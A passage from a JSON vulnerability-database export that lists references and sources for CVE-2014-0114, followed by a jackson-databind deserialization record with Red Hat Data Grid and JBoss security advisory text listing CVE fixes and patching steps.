"url": "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3cdev.drill.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3cdev.drill.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40@%3cgitbox.activemq.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1@%3cdev.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477@%3ccommits.dolphinscheduler.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639@%3ccommits.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3@%3cdevnull.infra.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3cissues.drill.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b@%3cannounce.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25@%3cdev.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f@%3cuser.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674379www-01.ibm.com/support/docview.wss?uid=swg21677335"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3ccommits.druid.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859@%3cdev.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10795183"
},
{
"trust": 0.6,
"url": "http://www.ibm.com/support/docview.wss?uid=ibm10872142"
},
{
"trust": 0.6,
"url": "https://issues.apache.org/jira/browse/beanutils-520"
},
{
"trust": 0.6,
"url": "https://www.mail-archive.com/announce@apache.org/msg05413.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10887121"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10957873"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10887119"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10887113"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10888007"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10887999"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10887973"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10888009"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/75922"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation-3/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation-2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.2568/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-dependent-libraries-affect-ibm-db2-leading-to-denial-of-service-or-privilege-escalation/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1427/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6494701"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-warehouse-has-released-a-fix-in-response-to-multiple-vulnerabilities-found-in-ibm-db2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.2355/"
},
{
"trust": 0.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsma-20-184-01"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-identified-in-ibm-storediq/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-have-been-identified-in-db2-that-affect-the-ibm-performance-management-product/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-db2-and-ibm-java-runtime-affect-ibm-spectrum-protect-server/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-open-source-used-in-ibm-cloud-pak-system/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2293.2/"
},
{
"trust": 0.6,
"url": "http://www.ibm.com/support/docview.wss?uid=ibm10879093"
},
{
"trust": 0.6,
"url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10872142"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/78218"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.3134/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072128"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-planning-analytics-workspace-is-affected-by-security-vulnerabilities-3/"
},
{
"trust": 0.3,
"url": "http://struts.apache.org/"
},
{
"trust": 0.3,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674379"
},
{
"trust": 0.3,
"url": "www-01.ibm.com/support/docview.wss?uid=swg21677335"
},
{
"trust": 0.2,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.2,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/en/support/security/"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/en/support/security/advisories/"
},
{
"trust": 0.1,
"url": "http://www.openwall.com/ove/"
},
{
"trust": 0.1,
"url": "https://rhn.redhat.com/errata/rhsa-2014-0474.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/#package"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/site/articles/11258"
},
{
"trust": 0.1,
"url": "https://www.redhat.com/security/data/cve/cve-2014-0114.html"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0114"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2014-0114"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.amq.broker\u0026version=7.5.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_amq/7.5/"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
},
{
"trust": 0.1,
"url": "http://www.hp.com/jp/icewall_patchaccess"
},
{
"trust": 0.1,
"url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
},
{
"trust": 0.1,
"url": "http://h30499.www3.hp.com/t5/hp-security-research-blog/protect-your-struts1-a"
}
],
"sources": [
{
"db": "BID",
"id": "67121"
},
{
"db": "PACKETSTORM",
"id": "126692"
},
{
"db": "PACKETSTORM",
"id": "149050"
},
{
"db": "PACKETSTORM",
"id": "126525"
},
{
"db": "PACKETSTORM",
"id": "137980"
},
{
"db": "PACKETSTORM",
"id": "154792"
},
{
"db": "PACKETSTORM",
"id": "126811"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006468"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056"
},
{
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULMON",
"id": "CVE-2014-0114",
"ident": null
},
{
"db": "BID",
"id": "67121",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126692",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "149050",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126525",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "137980",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154792",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126811",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006468",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2014-0114",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2014-04-30T00:00:00",
"db": "VULMON",
"id": "CVE-2014-0114",
"ident": null
},
{
"date": "2014-04-29T00:00:00",
"db": "BID",
"id": "67121",
"ident": null
},
{
"date": "2014-05-19T03:19:48",
"db": "PACKETSTORM",
"id": "126692",
"ident": null
},
{
"date": "2018-08-23T17:19:18",
"db": "PACKETSTORM",
"id": "149050",
"ident": null
},
{
"date": "2014-05-07T15:04:23",
"db": "PACKETSTORM",
"id": "126525",
"ident": null
},
{
"date": "2016-07-20T18:29:00",
"db": "PACKETSTORM",
"id": "137980",
"ident": null
},
{
"date": "2019-10-10T14:43:55",
"db": "PACKETSTORM",
"id": "154792",
"ident": null
},
{
"date": "2014-05-27T16:17:39",
"db": "PACKETSTORM",
"id": "126811",
"ident": null
},
{
"date": "2014-04-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-581",
"ident": null
},
{
"date": "2020-07-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-006468",
"ident": null
},
{
"date": "2014-06-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-000056",
"ident": null
},
{
"date": "2014-04-30T10:49:03.973000",
"db": "NVD",
"id": "CVE-2014-0114",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-13T00:00:00",
"db": "VULMON",
"id": "CVE-2014-0114",
"ident": null
},
{
"date": "2019-07-17T07:00:00",
"db": "BID",
"id": "67121",
"ident": null
},
{
"date": "2023-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-581",
"ident": null
},
{
"date": "2020-09-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-006468",
"ident": null
},
{
"date": "2015-01-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-000056",
"ident": null
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-0114",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "126692"
},
{
"db": "PACKETSTORM",
"id": "149050"
},
{
"db": "PACKETSTORM",
"id": "126525"
},
{
"db": "PACKETSTORM",
"id": "137980"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
}
],
"trust": 1.0
},
"title": {
"_id": null,
"data": "OpenClinic\u00a0GA\u00a0 Multiple vulnerabilities in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-006468"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
}
],
"trust": 0.6
}
}
VAR-202003-1778
Vulnerability from variot - Updated: 2026-03-09 21:52FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus). FasterXML jackson-databind Exists in unspecified vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x versions prior to 2.9.10.4 due to insecure deserialization of com.caucho.config.types.ResourceRef (caucho-quercus). A remote attacker could exploit this vulnerability with specially crafted input to execute arbitrary code on the system. Solution:
Before applying this update, ensure all previously released errata relevant to your system have been applied.
For details about how to apply this update, see:
https://access.redhat.com/articles/11258
- JIRA issues fixed (https://issues.jboss.org/):
JBEAP-18793 - GSS Upgrade Hibernate ORM from 5.3.16 to 5.3.17 JBEAP-19095 - GSS Upgrade wildfly-http-client from 1.0.20 to 1.0.21 JBEAP-19134 - (7.3.z) Upgrade HAL from 3.2.8.Final-redhat-00001 to 3.2.9.Final JBEAP-19185 - (7.3.z) Upgrade IronJacamar from 1.4.20.Final to 1.4.22.Final JBEAP-19203 - (7.3.z) WFCORE-4850 - Updating mockserver to 5.9.0. Exclusion of dependency from xom.io7m JBEAP-19205 - (7.3.z) Upgrade WildFly Core from 10.1.5.Final-redhat-00001 to 10.1.x JBEAP-19269 - GSS Upgrade jboss-logmanager from 2.1.14.Final to 2.1.15.Final JBEAP-19322 - (7.3.z) Upgrade XNIO from 3.7.7 to 3.7.8.SP1 JBEAP-19325 - (7.3.z) Upgrade Infinispan from 9.4.18.Final-redhat-00001 to 9.4.19.Final-redhat-00001 JBEAP-19397 - (7.3.z) Upgrade JSF based on Mojarra 2.3.9.SP09-redhat-00001 to 2.3.9.SP11-redhat-00001 JBEAP-19409 - Tracker bug for the EAP 7.3.2 release for RHEL-6 JBEAP-19529 - (7.3.z) Update PR template to include PR-processor hints. JBEAP-19564 - GSS Upgrade jboss-ejb-client from 4.0.31.Final-redhat-00001 to 4.0.33.Final-redhat-00001 JBEAP-19585 - GSS Upgrade org.jboss.genericjms from 2.0.4 to 2.0.6 JBEAP-19617 - (7.3.z) Upgrade wildfly-naming-client from 1.0.12.Final-redhat-00001 to 1.0.13.Final-redhat-00001 JBEAP-19619 - (7.3.z) Upgrade JBoss JSF API from 3.0.0.SP02-redhat-00001 to 3.0.0.SP04-redhat-00001 JBEAP-19673 - (7.3.z) [WFCORE] Upgrade WildFly Common to 1.5.2.Final JBEAP-19674 - (7.3.z) [WFCORE] Upgrade galleon and wildfly-galleon-plugins from 4.1.2.Final to 4.2.4.Final JBEAP-19874 - GSS Upgrade wildfly-http-client from 1.0.21.Final-redhat-00001 to 1.0.22.Final-redhat-00001
-
Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
-
Description:
Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.
It is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: Red Hat Data Grid 7.3.7 security update Advisory ID: RHSA-2020:3779-01 Product: Red Hat JBoss Data Grid Advisory URL: https://access.redhat.com/errata/RHSA-2020:3779 Issue date: 2020-09-17 CVE Names: CVE-2017-7658 CVE-2019-10172 CVE-2020-1695 CVE-2020-1710 CVE-2020-1719 CVE-2020-1745 CVE-2020-1748 CVE-2020-1757 CVE-2020-8840 CVE-2020-9488 CVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10672 CVE-2020-10673 CVE-2020-10714 CVE-2020-10968 CVE-2020-10969 CVE-2020-11111 CVE-2020-11112 CVE-2020-11113 CVE-2020-11612 CVE-2020-11619 CVE-2020-11620 ==================================================================== 1. Summary:
An update for Red Hat Data Grid is now available.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat Data Grid is a distributed, in-memory, NoSQL datastore based on the Infinispan project.
This release of Red Hat Data Grid 7.3.7 serves as a replacement for Red Hat Data Grid 7.3.6 and includes bug fixes and enhancements, which are described in the Release Notes, linked to in the References section of this erratum.
Security Fix(es):
-
jetty: Incorrect header handling (CVE-2017-7658)
-
EAP: field-name is not parsed in accordance to RFC7230 (CVE-2020-1710)
-
undertow: AJP File Read/Inclusion Vulnerability (CVE-2020-1745)
-
undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass (CVE-2020-1757)
-
jackson-databind: Lacks certain xbean-reflect/JNDI blocking (CVE-2020-8840)
-
jackson-databind: Serialization gadgets in shaded-hikari-config (CVE-2020-9546)
-
jackson-databind: Serialization gadgets in ibatis-sqlmap (CVE-2020-9547)
-
jackson-databind: Serialization gadgets in anteros-core (CVE-2020-9548)
-
jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution (CVE-2020-10672)
-
jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution (CVE-2020-10673)
-
jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider (CVE-2020-10968)
-
jackson-databind: Serialization gadgets in javax.swing.JEditorPane (CVE-2020-10969)
-
jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory (CVE-2020-11111)
-
jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider (CVE-2020-11112)
-
jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime (CVE-2020-11113)
-
jackson-databind: Serialization gadgets in org.springframework:spring-aop (CVE-2020-11619)
-
jackson-databind: Serialization gadgets in commons-jelly:commons-jelly (CVE-2020-11620)
-
jackson-mapper-asl: XML external entity similar to CVE-2016-3720 (CVE-2019-10172)
-
resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class (CVE-2020-1695)
-
Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain (CVE-2020-1719)
-
Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain (CVE-2020-1748)
-
wildfly-elytron: session fixation when using FORM authentication (CVE-2020-10714)
-
netty: compression/decompression codecs don't enforce limits on buffer allocation sizes (CVE-2020-11612)
-
log4j: improper validation of certificate with host mismatch in SMTP appender (CVE-2020-9488)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
To install this update, do the following:
- Download the Data Grid 7.3.7 server patch from the customer portal. See the download link in the References section.
- Back up your existing Data Grid installation. You should back up databases, configuration files, and so on.
- Install the Data Grid 7.3.7 server patch. Refer to the 7.3 Release Notes for patching instructions.
-
Restart Data Grid to ensure the changes take effect.
-
Bugs fixed (https://bugzilla.redhat.com/):
1595621 - CVE-2017-7658 jetty: Incorrect header handling 1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720 1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class 1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass 1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230 1796617 - CVE-2020-1719 Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain 1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability 1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain 1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1816216 - CVE-2020-11612 netty: compression/decompression codecs don't enforce limits on buffer allocation sizes 1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking 1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config 1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap 1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core 1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider 1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane 1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory 1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider 1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime 1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication 1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly 1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop 1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender
- References:
https://access.redhat.com/security/cve/CVE-2017-7658 https://access.redhat.com/security/cve/CVE-2019-10172 https://access.redhat.com/security/cve/CVE-2020-1695 https://access.redhat.com/security/cve/CVE-2020-1710 https://access.redhat.com/security/cve/CVE-2020-1719 https://access.redhat.com/security/cve/CVE-2020-1745 https://access.redhat.com/security/cve/CVE-2020-1748 https://access.redhat.com/security/cve/CVE-2020-1757 https://access.redhat.com/security/cve/CVE-2020-8840 https://access.redhat.com/security/cve/CVE-2020-9488 https://access.redhat.com/security/cve/CVE-2020-9546 https://access.redhat.com/security/cve/CVE-2020-9547 https://access.redhat.com/security/cve/CVE-2020-9548 https://access.redhat.com/security/cve/CVE-2020-10672 https://access.redhat.com/security/cve/CVE-2020-10673 https://access.redhat.com/security/cve/CVE-2020-10714 https://access.redhat.com/security/cve/CVE-2020-10968 https://access.redhat.com/security/cve/CVE-2020-10969 https://access.redhat.com/security/cve/CVE-2020-11111 https://access.redhat.com/security/cve/CVE-2020-11112 https://access.redhat.com/security/cve/CVE-2020-11113 https://access.redhat.com/security/cve/CVE-2020-11612 https://access.redhat.com/security/cve/CVE-2020-11619 https://access.redhat.com/security/cve/CVE-2020-11620 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product\xdata.grid&downloadType=securityPatches&version=7.3 https://access.redhat.com/documentation/en-us/red_hat_data_grid/7.3/html/red_hat_data_grid_7.3_release_notes/index
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBX2Nf/dzjgjWX9erEAQifjA/7BlSA2KK7e4RlxfRAP3Sj7xT+CRlFcOJn NVVI6DNpfZNtD/TJ4M5JFMP/yzKb+/FoaGVUexqiUxQBcrYsViZdfwfQ6PSwQgd8 5GAtC0NINGYmr0y7m6sKbAwAofnmCoEjNPjpdfLG632Err4vXDT9pGx1RNIrfS0A qaOSuf2BjZkD9A6Azroupq/ePmRnDBW4ovWF4ES415Pa5T7N4rmoyZ3UnGrbubmm GisjzhBbFyjL2wM1gMtqKlf5Qdre0XQIio4YLEnK1DaS7qLS36L04UJP9rwtB/nn aCOKZE/4Ch0gYcNlwniH4MK4Aiy/z/OGQopuhJoKFADJ3Y5lnJwCWDMjMKwWSj1G DvKG4uSIa8l2oxGQURThwxY1Jr7sbQTy2QXCVoyZj9oOKoGel+qJaGVFVnwsOpB7 MB8nPAuINZ91RR7xSBLv/AyoLnXV3dI97kOyTwEhld6THIwAUWqk+V2y7M6Onlx9 Pf+whfe0ORHzeCj/UBZh2NqcuShUpjdE9aLyYyefa2VV4t+0L4XlIfnlNuL8Ja7j wzLJlo/u8XMktoXRrBpMWZaCzcqN1+BTuQUXNZeqfNtgFmCgJVxp6tHyHni7flQq P2M8FaCyQHyQ1ggSljgZ66AEdiwatYpqOxR4yUyrKmsXt9iPsX45TdA9zSKmF2Sb PyKX8lLP6w8=n+2X -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Security Fix(es):
-
netty (CVE-2016-4970 CVE-2020-7238 CVE-2019-20444 CVE-2019-20445)
-
dom4j (CVE-2018-1000632)
-
elasticsearch (CVE-2018-3831)
-
pdfbox (CVE-2018-11797)
-
vertx (CVE-2018-12541)
-
spring-data-jpa (CVE-2019-3797)
-
mina-core (CVE-2019-0231)
-
jackson-databind (CVE-2019-12086 CVE-2019-16335 CVE-2019-14540 CVE-2019-17267 CVE-2019-14892 CVE-2019-14893 CVE-2019-16942 CVE-2019-16943 CVE-2019-17531 CVE-2019-20330 CVE-2020-10673 CVE-2020-10672 CVE-2020-8840 CVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10968 CVE-2020-10969 CVE-2020-11111 CVE-2020-11112 CVE-2020-11113 CVE-2020-11620 CVE-2020-11619 CVE-2020-14195 CVE-2020-14060 CVE-2020-14061 CVE-2020-14062)
-
jackson-mapper-asl (CVE-2019-10172)
-
hawtio (CVE-2019-9827)
-
